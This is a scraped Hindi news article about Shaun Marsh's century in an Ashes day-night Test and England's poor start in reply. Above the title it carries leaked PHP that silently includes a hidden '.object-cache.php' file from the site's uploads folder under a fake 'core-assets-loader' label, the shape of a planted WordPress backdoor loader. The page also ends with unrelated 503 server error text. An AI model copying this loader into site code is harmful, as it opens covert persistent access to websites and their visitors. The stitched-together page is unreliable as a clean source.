add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मार्श के शतक से ऑस्ट्रेलिया मजबूत, इंग्लैंड की खराब शुरूआत – SOCH INDIA
Menu

खेल
मार्श के शतक से ऑस्ट्रेलिया मजबूत, इंग्लैंड की खराब शुरूआत

nobanner

आठवीं बार टीम में वापसी कर रहे शॉन मार्श ने विषम परिस्थितियों में शतक जड़कर वापसी का शानदार जश्न मनाया. मार्श की शतकीय पारी की मदद से ऑस्ट्रेलिया ने पहली पारी में मजबूत स्कोर खड़ा किया और दूसरे दिन का खेल खत्म होने से पहले इंग्लैंड को पहला झटका भी दे दिया.

मार्श ने नाबाद 126 रन बनाये जो उनके टेस्ट करियर का पांचवां शतक है. उन्होंने विकेटकीपर बल्लेबाज टिम पेन (57) के साथ छठे विकेट के लिए 85 और नौवें नंबर के बल्लेबाज पैट कमिन्स (44) के साथ आठवें विकेट के लिये 99 रन की साझेदारी की. ऑस्ट्रेलिया ने एशेज के पहले डे-नाइट मैच में अपनी पहली पारी आठ विकेट पर 442 रन बनाकर समाप्त घोषित की.

इसके जवाब में इंग्लैंड की शुरूआत अच्छी नहीं रही और बारिश के कारण जब दिन का खेल रोका गया तब उसने एक विकेट पर 29 रन बनाये थे. मिशेल स्टार्क ने मार्क स्टोनमैन (18) को पगबाधा आउट करके ऑस्ट्रेलिया को यह सफलता दिलायी. स्टोनमैन ने रेफरल भी लिया लेकिन इससे भी मैदानी अंपायर का फैसला नहीं बदला.

स्टंप उखड़ने के समय एलिस्टेयर कुक 11 रन पर खेल रहे थे जबकि जेम्स विन्स को अभी अपना खाता खोलना है. इंग्लैंड अभी ऑस्ट्रेलिया से 413 रन पीछे है.

इससे पहले ऑस्ट्रेलियाई पारी का आकर्षण मार्श की धैर्यपूर्ण शतकीय पारी रही. उन्होंने 328 मिनट में 213 गेंदों का सामना करके अपना शतक पूरा किया. उन्होंने अपनी नाबाद पारी में कुल 231 गेंदें खेली तथा 15 चौके और एक छक्का लगाया.

कमिन्स ने भी अपने जज्बे का अच्छा नमूना पेश किया. उन्होंने 37वीं गेंद पर अपना खाता खोला लेकिन इसके बाद कुछ अच्छे शॉट लगाये और अपने टेस्ट करियर का सर्वोच्च स्कोर बनाया. कमिन्स ने अपनी 90 गेंद की पारी में सात चौके लगाए. जब ऑस्ट्रेलिया पारी समाप्ति की घोषणा की तब मार्श के साथ नाथन लियोन दस रन पर खेल रहे थे.

ऑस्ट्रेलिया ने सुबह चार विकेट पर 209 रन से अपनी पारी आगे बढ़ायी लेकिन पीटर हैंडसकांब (36) अपने कल के स्कोर में कोई इजाफा किये बिना स्टुअर्ट ब्रॉड की गेंद पर पगबाधा आउट हो गए. इंग्लैंड की तरफ से ब्राड ने दो जबकि क्रेग ओवर्टन ने तीन विकेट लिए.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.